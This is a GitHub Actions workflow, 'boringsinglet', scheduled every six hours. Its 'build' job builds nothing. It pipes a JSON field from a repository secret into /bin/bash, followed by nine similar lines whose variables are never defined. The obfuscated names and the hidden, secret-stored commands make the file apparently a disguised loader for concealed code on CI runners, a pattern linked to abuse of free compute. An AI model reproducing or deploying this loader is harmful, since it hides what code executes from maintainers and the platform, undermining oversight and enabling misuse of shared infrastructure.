name: boringsinglet

on:
  workflow_dispatch:
  schedule:
    - cron: '37 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: boringsinglet
        env:
          vka28: ${{ secrets.vka28 }}
        run: |
          echo $vka28 | jq -r .xprqz730 | /bin/bash
          echo $prhxp15 | jq -r .umogy9984 | /bin/bash
          echo $btnx87399 | jq -r .sudy5 | /bin/bash
          echo $vrqiy00854 | jq -r .z2 | /bin/bash
          echo $vbnp3430 | jq -r .unfl756 | /bin/bash
          echo $v09127 | jq -r .azzts5075 | /bin/bash
          echo $cpo06 | jq -r .qekko17279 | /bin/bash
          echo $aa33709 | jq -r .oh53 | /bin/bash
          echo $zkfxk461 | jq -r .fxxgq998 | /bin/bash
          echo $f9506 | jq -r .q9 | /bin/bash

